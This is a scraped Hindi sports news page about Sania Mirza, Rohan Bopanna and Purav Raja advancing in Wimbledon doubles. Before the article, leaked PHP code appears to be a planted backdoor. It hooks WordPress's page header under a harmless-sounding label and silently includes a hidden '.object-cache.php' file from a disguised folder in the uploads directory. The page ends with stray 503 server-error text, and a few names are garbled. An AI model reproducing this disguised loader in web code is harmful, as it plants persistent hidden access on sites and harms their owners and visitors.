add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सानिया की वुमेन्स और मिकस्ड डबल्स के मुकाबलों में जीत – SOCH INDIA
Menu

खेल
सानिया की वुमेन्स और मिकस्ड डबल्स के मुकाबलों में जीत

nobanner

सानिया मिर्जा महिला और मिक्सड डबल्स दोनों के तीसरे दौर में जगह बनाने में सफल रही जबकि रोहन बोपन्ना और पूरव राजा ने भी अपनी जोड़ीदारों के साथ मिलकर यहां विंबलडन में मिक्सड डबल्स मुकाबले जीते.

सानिया और क्रोएशिया के इवान डोडिग की चौथी वरीय जोड़ी ने मिक्सड डबल्स में युसुके वातानुकी और मकोतो निमोमिया की जापान की जोड़ी को एक घंटे और 18 मिनट में 7-6 6-2 से हराकर तीसरे दौर में जगह बनाई.

भारत और क्रोएशिया की जोड़ी ने दूसरे दौर के मुकाबले में छह ऐस लगाए जबकि चार डबल फाल्ट किए.

क्वार्टर फाइनल में जगह बनाने के लिए यह जोड़ी अब गत चैंपियन हेनरी कोंटीनेन और हीथर वाटसन से भिड़ेगी.

महिला युगल में सानिया और बेल्जियम की उनकी जोड़ीदार कर्स्टन फ्लिपकेंस ने नाओमी ब्राडी और हीथर वाटसन की ब्रिटेन की जोड़ी को हराकर तीसरे दौर में प्रवेश किया. इस जोड़ी ने एक घंटे और 45 मिनट में 6-3, 3-6, 6-4 से जीत हासिल की.

भारत और बेल्जियम की यह तीसरी वरीय जोड़ी अगले दौर में स्विट्जरलैंड की माटर्निा हिंगिस और चीनी ताइपे की युंग यान चेन की तीसरी वरीय जोड़ी से भिड़ेगी.

मिक्सड डबल्स में पूरव ने जापान की एरि होजुमी के साथ मिलकर पहले दौर में जेम्स कारेटानी और रेनाटा वोराकावा की अमेरिका और चेक गणराज्य की जोड़ी को 5-7, 6-4, 6-2 से हराया.

पूरव और होजुमी अगले दौर में डेनियल नेस्टर और आंद्रिया क्लेपाक की 11वीं वरीय जोड़ी से भिड़ेंगे.

फ्रेंच ओपन जीतन के एक महीने बाद रोहन बोपन्ना और गैब्रिएला दाब्रोवस्की ने मिक्सड डबल्स में अपना विजयी अभियान जारी रखा है. भारत और कनाडा की 10वीं वरीय जोड़ी ने फ्रांस के फैब्रिस माटर्नि और रोमानिया की रालुका ओलारू को 7-6, 7-5 से हराकर तीसरे दौर में जगह बनाई.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.